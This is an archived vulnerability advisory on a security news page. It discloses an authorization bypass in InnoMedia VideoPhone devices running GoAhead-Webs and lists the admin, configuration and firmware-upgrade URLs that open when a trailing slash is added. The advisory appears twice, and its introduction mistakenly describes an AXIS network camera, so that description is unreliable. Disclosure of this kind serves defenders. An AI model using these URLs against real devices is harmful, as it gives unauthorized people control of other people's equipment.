HNS MAIN FEED
Tuesday, 15:23 EST
- OpenDNSSEC 1.0.0 released
- Microsoft releases giant patch collection
- 81% percent of e-mail links to malware
- Unaware of the dangers, most teens share personal info online
- Data harvested from Facebook used in boiler room scams
- A closer look at USB Secure 1.3.0
- Safety tips for online dating
- Researcher hacks security encryption chip found on millions of PCs
- Is authenticated XSS a problem?
- Online shopping safety: Consumers hold retailers responsible
- Seagate ships the Savvio 10K.4 hard drive
- Political hacktivism and the exploitation of tragedies is on the rise
InnoMedia VideoPhone Authorization Bypass Vulnerability
09 March 2004
From: "Rafel Ivgi, The-Insider" <theinsider(at)012.net.il>
Application: InnoMedia VideoPhone
Server: GoAhead-Webs
Vendors: InnoMedia Pte Ltd
GoAhead Ltd
http://www.innomedia.com/
http://www.goahead.com/
Versions: au75200xvi04010x
Platforms: Windows
Bug: Authorization Bypass
Risk: High
Exploitation: remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
1) Introduction
2) Bugs
3) The Code
===============
1) Introduction
===============
The AXIS 2100 Network Camera offers crisp, quality images and streaming video from anywhere on your network. It lets you keep a close eye on the world around you, or show your part of it through the Web.
With a built-in high performance Web server, no PC is required. The network camera can operate as a standalone or be placed wherever there is a LAN or Internet connection, or an available modem.
======
2) Bug
======
Browsing the server normally
http://<host>/
Will show some info about the server.
The server's menu appears on the left side and contains a few links to protected files, which setup the server's settings/configuration. When refering to any of the menu's "protected" links, such as: http://<host>/videophone_admindetail.asp
A "Basic Authorization" request pops up.
This authorization can be easily bypassed by refering to the same file as a folder.
http://<host>/videophone_admindetail.asp/
===========
3) The Code
===========
http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
http://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."
Application: InnoMedia VideoPhone
Server: GoAhead-Webs
Vendors: InnoMedia Pte Ltd
GoAhead Ltd
http://www.innomedia.com/
http://www.goahead.com/
Versions: au75200xvi04010x
Platforms: Windows
Bug: Authorization Bypass
Risk: High
Exploitation: remote with browser
Date: 25 Dec 2003
Author: Rafel Ivgi, The-Insider
e-mail: the_insider@mail.com
web: http://theinsider.deep-ice.com
1) Introduction
2) Bugs
3) The Code
===============
1) Introduction
===============
The AXIS 2100 Network Camera offers crisp, quality images and streaming video from anywhere on your network. It lets you keep a close eye on the world around you, or show your part of it through the Web.
With a built-in high performance Web server, no PC is required. The network camera can operate as a standalone or be placed wherever there is a LAN or Internet connection, or an available modem.
======
2) Bug
======
Browsing the server normally
http://<host>/
Will show some info about the server.
The server's menu appears on the left side and contains a few links to protected files, which setup the server's settings/configuration. When refering to any of the menu's "protected" links, such as: http://<host>/videophone_admindetail.asp
A "Basic Authorization" request pops up.
This authorization can be easily bypassed by refering to the same file as a folder.
http://<host>/videophone_admindetail.asp/
===========
3) The Code
===========
http://<host>/videophone_admindetail.asp/
http://<host>/videophone_syscfg.asp/
http://<host>/videophone_upgrade.asp/
http://<host>/videophone_sysctrl.asp/
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Things that are unlikeable, are NOT impossible."